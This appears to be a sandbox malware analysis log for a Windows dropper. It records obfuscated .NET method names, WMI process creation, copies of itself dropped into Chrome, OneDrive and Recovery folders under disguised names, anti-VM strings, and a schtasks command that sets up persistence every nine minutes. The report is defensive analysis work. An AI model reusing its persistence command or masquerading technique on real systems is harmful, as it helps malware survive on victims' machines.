            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, P5QyLhd0mjpRtCodo6j.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'NhISj3QC49S6356ULGy', 'G3TalpQOOnfoxsxuMLq', 'YOwp0rQ4EHUW4kT7NFs', 'baesXUQ6EsNWQePVB2a', 'h5QfRYQoDU3BR2MwoEe', 'mvPy0AQIlLKAmyagyHJ'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, cLN9pYsiyBcbtCVjC8K.csHigh entropy of concatenated method names: 'DVeAR2vL2b', 'QGCAHHl2UN', 'cu8Al2FJeP', 'ecGjaMyd9894HPaipDW', 'hG9hcNyk25MmU0tFfwE', 'Bvymg2y9awlcR0KVVsj', 'kfWbrEyuaqDHd2uV5ID', 'Mhkx6yyh7OBxbeqbFnA', 'RaNNdOylAgPDDdxyOov', 'jX3X8oy13rJiDECpGqR'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, WWV7hlDamAWwn7689hH.csHigh entropy of concatenated method names: 'z6okTCa2aJ', 'IR3ksQjAkO', 'HbLkJwHnun', 'VOEkWGCu3x', 'bbwkxcOHvp', 'VLskS8Swbx', 'tQ9oYA40NwG90b1AWJT', 'SLNAOp4ekhVRExnYaqC', 'zh1Fnn4MGg50rFlektN', 'T3hDdt4s1bnFNiZFsAf'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, NUd9HRsLDxvreEFN9km.csHigh entropy of concatenated method names: 's4mAu8clVl', 'FMeAvJ2Ohg', 'fjXAr4ss2t', 'zNxAtCfZle', 'tG0AP53fKb', 'tmHPAwyCQIq4yqYrLQ0', 'aXIExiyOo8t8KoRnjXX', 'e2j3CfyBDexoKOCFLV7', 'RUsXApy21pXUOjyj0fw', 'W4BV5ny4BdVgKtEucBj'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, xwsHwhdpn6hsRe4K61G.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'fVgXI6QMH1tegOjx4Ua', 'RDCaL4Q0Fg1QSQjbZMf', 'uSdurcQs9nqPRbHV8xU', 'w3ZtcxQUJ0C78F0TRnG', 'rDIgfsQrl20NyJLbV9q', 'aCkguKQ76rnbVZl13sE'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, XT0rk7xhOKcrM8xSKcD.csHigh entropy of concatenated method names: 'hgSmjUxg59', 'Aq0m8TjQkJ', 'sFTm7Cf92h', 'bbWZxivB2HsdkokQ1Bn', 'Ap3QHRv2kg6JxncCk0W', 'ILDLekvCDW1djdHZR6a', 'G94nLvvOyu40S01GGHP', 'oGWDgXv4DvJCdO2WHvs', 'pIT7cwv62iP3snjVS7k', 'v05iFBvNCiIUdvJo1FG'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, V7JiufXpoy9YnU5IPg9.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, mRRjw6dGBBsj551xrKv.csHigh entropy of concatenated method names: 'GuKbsIk9sO', 'sDl03s8JRyRomsWUH7B', 'JN5b988mkHhqaZLDrAf', 'vPtXoj8nE2492CyjwkI', 'GiyHUi85Y8xDSGgINes', 'C7D1us8yMNh6qV3OSVY', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, PpVmKa4iNYreoSl1MX.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'cUGP3sDgpLEEK3b3KPU', 'yxGpViDv2XJF4S576Kh', 'FqhE3mD3YWyGGMEnUBS', 'DysdTtDF8RU3ZC30Hqs', 'OKpZfGDKqRP1ycIV6qB', 'nkBsadD9Wadw65U9rnI'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, ikeuendKMRyEhRKwsvS.csHigh entropy of concatenated method names: 'TQ2bVBtyYV', 'oKWNjW8EYSRxuxeQALo', 'VA6hKN8bD8JgLM5BUNO', 'xYmCn78WaGIDVPis4H3', 's6J8tZ8P7nlnaAlKLLg', 'LrIKvV8D1fr6RIljUwg', 'xoBh468xrFwFZXp77OA', 'lI0SnK8cbqoSfkowage', 'qSWbyrLUeu', 'hJggUf8X5bV3rQWqTmm'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, hE5DDyZcDDOTuuctC3b.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'DWPoGnnLdr', 'ikxpRLCnO6', 'T86oBD9RK6', 'Gr3ZZN5FuvGw8wIpGpo', 'Np3bS85KRj6GaK5Velk', 'j3olWF59jDTyMaqg8aD', 'Y9xHFf5uHVbhBJuMaWU', 'WUQBd25dS7Fo5DnRIZH'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, SoI4wQdS1kvbcpc9Elm.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'khwBT5Vl27dRckXO6Tf', 'UWSdZtV14xHTGD8e7ao', 'Pvq3e5VGYdB4HMwfjWm', 'kxBVEpVpBuDsCsqMftQ', 'T7rtoeVnBUYcfCwDiGX', 'mBT1BMV5Gpb1g3EYJIV'

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Drops executable to a common third party application directory
            Source: C:\chainSurrogate\browsersvc.exeFile written: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeFile created: C:\chainSurrogate\browsersvc.exeJump to dropped file
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Windows\L2Schemas\OfficeClickToRun.exeJump to dropped file
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exeJump to dropped file
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeJump to dropped file
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\chainSurrogate\UAhpvIJrmb.exeJump to dropped file
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Recovery\UAhpvIJrmb.exeJump to dropped file
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeJump to dropped file
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exeJump to dropped file
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exeJump to dropped file
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Windows\L2Schemas\OfficeClickToRun.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /f
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeMemory allocated: 1540000 memory reserve | memory write watchJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeMemory allocated: 1AF60000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeMemory allocated: 1540000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeMemory allocated: 1B0D0000 memory reserve | memory write watchJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeWindow / User API: threadDelayed 1202Jump to behavior
            Source: C:\chainSurrogate\browsersvc.exeWindow / User API: threadDelayed 961Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeWindow / User API: threadDelayed 1046Jump to behavior
            Source: C:\chainSurrogate\browsersvc.exe TID: 4948Thread sleep count: 1202 > 30Jump to behavior
            Source: C:\chainSurrogate\browsersvc.exe TID: 4948Thread sleep count: 961 > 30Jump to behavior
            Source: C:\chainSurrogate\browsersvc.exe TID: 1060Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 7124Thread sleep count: 1046 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 7428Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 7428Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 1696Thread sleep count: 189 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 7428Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 7428Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 2756Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe TID: 984Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\chainSurrogate\browsersvc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009FA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_009FA5F4
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A0B8E0
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0DD72 VirtualQuery,GetSystemInfo,0_2_00A0DD72
            Source: C:\chainSurrogate\browsersvc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: browsersvc.exe, 00000004.00000002.1771032686.000000000314B000.00000004.00000800.00020000.00000000.sdmp, browsersvc.exe, 00000004.00000002.1771032686.0000000003118000.00000004.00000800.00020000.00000000.sdmp, 1b42ae2595212a1.4.drBinary or memory string: xJOThrWTc5CoXqajFGuc5AOJRFt4Ts5GoL3w8kI8s6ak1fLnaiqEZpXw5EBc7bAu959Lwolf8vu9jnSw4GeuB1q8yG14iqBQ5ql5g90w7LGn5YNRvPi07QsIOAXqwr6SudD3CXP4Psw0vDDZ3jISHKTp7dqgmK9QOx2cVUPYAnlOd2WL77wNinKjJY5iqtSEtgl7KkEjUtSejFMFGfjoYwrknTS6YqrQVgf6QZAW3N3yUqAELzcLKnq7yAU1RHKnCCICkPyqeMuK33P7SOvjOfGrziIPFIEvCPwSh7e6Avr73fD5vWjDWl
            Source: wscript.exe, 00000001.00000003.1743796050.00000000026DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000001.00000003.1743796050.00000000026DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\feW
            Source: browsersvc.exe, 00000004.00000002.1774357703.000000001BF16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\e
            Source: browsersvc.exe, 00000004.00000002.1775639585.000000001C250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: UAhpvIJrmb.exe, 00000023.00000002.1788521774.000000001C1A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
            Source: browsersvc.exe, 00000004.00000002.1775639585.000000001C250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: browsersvc.exe, 00000004.00000002.1775639585.000000001C250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeAPI call chain: ExitProcess graph end nodegraph_0-24472
            Source: C:\chainSurrogate\browsersvc.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A1866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A1866F
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A1753D mov eax, dword ptr fs:[00000030h]0_2_00A1753D
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A1B710 GetProcessHeap,0_2_00A1B710
            Source: C:\chainSurrogate\browsersvc.exeProcess token adjusted: DebugJump to behavior
